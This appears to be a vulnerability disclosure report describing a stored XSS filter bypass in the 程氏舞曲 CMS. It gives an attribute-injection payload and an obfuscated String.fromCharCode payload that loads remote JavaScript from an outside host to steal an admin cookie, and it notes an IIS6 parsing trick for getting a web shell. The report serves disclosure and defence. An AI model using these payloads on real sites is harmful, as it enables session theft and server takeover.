程氏舞曲储存型xss（3）附后台getshell

### 简要描述： 没有过滤完全。。 ### 详细说明： 官方修补的还不是很完美呢， 黑盒测试下，在上次添加文章处 提交 `<img src =x onerror=""> <script>` 后台查看源码 内容已经没有了 提交 `<img>` 后台查看源码 有 `<img>` 提交 onerror 后台 看下 出现了 onerror 那么，基本可以确定 是判断 <>内 是否存在 script onerror onclick。。。等关键字。 这样就很好办了， 找到一个位于html 标签属性内的可控点 就行了 当然 还要 ""闭合，然而在文章标题处输入 " 发现"被过滤成 \&quot;了, 经过一轮 fuzzing，发现 在 添加专题处 [<img src="https://images.seebug.org/upload/201403/060335074a71fd689c8c9733f342b5c41f71749e.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060335074a71fd689c8c9733f342b5c41f71749e.jpg) 抓包 修改cs_pic 值为 ``` " onfocusin=alert(0) autofocus x=" ``` [<img src="https://images.seebug.org/upload/201403/060337527d626cfdb1abfab9a5d4b728a037dc8e.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060337527d626cfdb1abfab9a5d4b728a037dc8e.jpg) 成功alert [<img src="https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg) 当然 仅仅是alert还是不够的，远程加载js才是王道。。。。 应为对 单引号的过滤 所以可以类似于这样 ``` onfocusin=write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,47,47,120,115,115,46,119,101,98,118,117,108,46,99,111,109,47,53,78,86,104,110,83,34,62,60,47,115,99,114,105,112,116,62)) autofocus x=" ``` 收到cookie，打到后台 [<img src="https://images.seebug.org/upload/201403/06034356ec0ed0d8fb84fe256843b931b4978eaf.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06034356ec0ed0d8fb84fe256843b931b4978eaf.jpg) getshell的话，iis6下解析漏洞 模板名改为 xxx.php;即可 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg)